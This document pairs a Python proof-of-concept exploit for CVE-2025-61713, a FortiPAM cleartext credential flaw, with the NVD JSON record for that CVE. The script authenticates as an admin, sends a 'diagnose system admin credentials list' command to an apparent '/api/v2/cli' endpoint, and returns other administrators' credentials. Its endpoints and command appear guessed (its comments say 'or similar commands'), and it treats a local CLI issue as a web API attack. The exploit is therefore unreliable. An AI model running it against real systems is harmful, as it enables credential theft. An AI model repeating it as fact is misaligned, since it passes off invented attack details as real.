CVE-2025-61713

# CVE-2025-61713 PoC - FortiPAM Cleartext Storage of Credentials # Requirements: Valid admin account with read-write privileges # This PoC demonstrates the vulnerability via CLI diagnostic commands import requests import json # Configuration target_host = "https://fortipam.example.com" username = "admin" password = "password" # Authentication auth_payload = { "username": username, "password": password } # Note: This PoC requires valid authentication and CLI access # The actual exploit involves running diagnostic commands in CLI: # diagnose system admin credentials list # or similar commands that expose plaintext credentials def exploit_fortipam(): """ FortiPAM CVE-2025-61713 Exploitation Attackers with admin CLI access can retrieve other admin credentials """ print("[*] CVE-2025-61713 FortiPAM Credential Disclosure") print("[*] Target:", target_host) # Step 1: Authenticate with admin credentials session = requests.Session() auth_response = session.post( f"{target_host}/api/v2/login", json=auth_payload ) if auth_response.status_code != 200: print("[-] Authentication failed") return None print("[+] Authentication successful") # Step 2: Execute diagnostic command via CLI API # The vulnerable endpoint exposes credentials in plaintext cli_command = "diagnose system admin credentials list" cli_payload = { "method": "exec", "params": [ { "url": "sys/proxy/helper", "data": [cli_command] } ] } poc_response = session.post( f"{target_host}/api/v2/cli", json=cli_payload ) # Step 3: Extract exposed credentials if poc_response.status_code == 200: result = poc_response.json() print("[+] Vulnerable endpoint accessed") print("[+] Response contains plaintext credentials") return result return None if __name__ == "__main__": exploit_fortipam()

{"cve": {"id": "CVE-2025-61713", "sourceIdentifier": "[email protected]", "published": "2025-11-18T17:16:07.630", "lastModified": "2025-11-20T14:37:37.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cleartext Storage of Sensitive Information in Memory vulnerability [CWE-316] in Fortinet FortiPAM 1.6.0, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions may allow an authenticated attacker with read-write admin privileges to the CLI to obtain other administrators' credentials via diagnose commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-316"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.6.1", "matchCriteriaId": "EB0F5A7C-02C2-4D67-92BC-15380F86A373"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-789", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}